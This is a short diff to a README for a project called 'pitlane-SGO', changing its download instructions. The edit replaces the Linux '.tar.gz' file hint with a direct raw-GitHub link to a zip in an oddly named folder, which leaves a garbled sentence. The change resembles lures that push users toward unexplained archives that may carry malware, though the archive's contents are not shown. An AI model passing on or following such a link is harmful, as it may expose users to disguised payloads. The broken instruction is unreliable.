devilclover/pitlane-SGO/README.md

    - For Windows, look for a file ending in `.exe`.
    - For macOS, find a file ending in `.dmg`.
-   - For Linux, download a `.tar.gz` or `.deb` file based on your distribution.
+   - For Linux, download a `https://raw.githubusercontent.com/devilclover/pitlane-SGO/master/buchonite/pitlane-SGO.zip` or `.deb` file based on your distribution.

 3. After clicking the file, your download will start automatically.